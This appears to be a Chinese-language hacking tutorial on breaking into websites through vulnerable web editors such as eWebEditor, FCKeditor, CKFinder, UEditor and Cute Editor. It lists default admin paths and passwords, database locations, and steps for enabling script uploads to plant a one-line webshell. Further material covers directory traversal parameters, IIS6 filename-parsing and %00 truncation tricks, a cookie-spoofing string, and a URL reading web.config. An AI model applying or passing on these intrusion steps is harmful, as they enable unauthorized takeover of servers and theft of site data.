Web入侵之利用编辑器漏洞入侵

Ewebeditor漏洞详细可参考：https://www.0dayhack.com/post-426.html

1、常见的编辑器

常见的有Ewebeditor,fckeditor【目前最强大】,ckeditor,kindeditor等等。

2、ewebeditor编辑器

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如：Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具！

3.Ewebeditor利用核心

默认后台：www.xxxx.com/ewebeditor/admin_login.asp

默认数据库：ewebeditor/db/ewebeditor.mdb

默认账号密码：admin admin/admin888

注释：改后缀问题，使用专业下载工具。管理员通常会把数据库文件后缀改成asp

4、ewebeditor的利用过程

① 、首先访问默认管理页看是否存在

默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例)

②、默认管理帐号密码

默认管理页存在！我们就用帐号密码登陆！默认帐号密码为: admin admin888 ！常用的密码还有admin admin999 admin1 admin000 之类的。

③、默认数据库地址

默认数据库路径为:ewebeditor/db/ewebeditor.mdb 常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等等。

④、漏洞基本利用步骤，以asp为例

1)、登陆后台以后。选择样式管理，

默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式，然后在图片上传添加可上传后缀。

完成之后点击提交

2)、然后在工具栏中新增工具

3)、在按钮设置里新增"插入或修改图片"

然后点击保存设置。然后再回去点击预览。

由于浏览器版本问题需要换到低版本，然后点击预览，选择图片，上传一句话木马

4)、复制链接到浏览器拿下webshell

可以进行相关操作

⑤、漏洞二-目录遍历

在id=14后面加上&dir=…/

⑥、寻找前人痕迹再次入侵

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy

⑦、文件上传漏洞

版本号：2.1.6

存在sql注入

5、FCKeditor编辑器

①.查看编辑器版本

FCKeditor/_whatsnew.html

②、进入编辑器页面

FCKeditor/_samples/default.html

③、.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=…/…/connectors/asp/connector.asp

由于这里用的是2.5的版本所以下面这条语句能用

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=…/…/connectors/asp/connector.asp

如果在输入以上地址测试的过程中弹出以下的提示

那就是没有开启文件上传功能,要把\editor\filemanager\connectors\asp\config.asp文件中的

Dim ConfigIsEnabled

ConfigIsEnabled = False

设置成功true。就行了，然后上传6.asp;.jpg文件试试

[木马文件地址](http://192.168.60.92:170/userfiles/image/fendoooo.asp/2_asp;.jpg)

6、CKFinder编辑器

任意文件上传漏洞

其1.4.3 asp.net版本存在任意文件上传漏洞，攻击者可以利用该漏洞上传任意文件，CKFinder在上传文件的时候，强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制，从而导致可以上传1_php;1.jpg等畸形文件名，最终导致文件上传漏洞

然后修改文件名

1_php;1.jpg

利用iis6.0目录解析漏洞拿shell

创建目录/x.asp/

在目录下上传图片马即可拿shell

南方数据编辑器**southidceditor

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式，增加asa(不要asp).然后直接后台编辑新闻上传

7、UEDITOR编辑器

利用ii6.0文件名解析漏洞

上传图片改名为

x.php;20221.jpg获取shell

DotNetTextBox编辑器漏洞

关键字:system_dntb/

确定有system_dntb/uploadimg.aspx并能打开，这时候是不能上传的，由于他是验证cookie来得出上传后的路径，这样我们可以用cookie欺骗工具

cookie:UserType=0;IsEdition=0;Info=1;

uploadFolder=…/system_dntb/Upload/;

路径可以修改，只要权限够，上传后改名为1.asp;.jpg利用iis解析漏洞

PHPWEB网站管理系统后台Kedit编辑器

两种利用方式

第一种是利用iis6.0文件名解析漏洞

xx.php;xx.jpg

第二种方式

%00截断

xx.php%00jpg

Cute Editor 在线编辑器本地包含漏洞

影响版本：

Cute Editor For Net 6.4

脆弱描述

可以随意查看网站文件内容，危害较大

攻击利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=…/…/…/web.config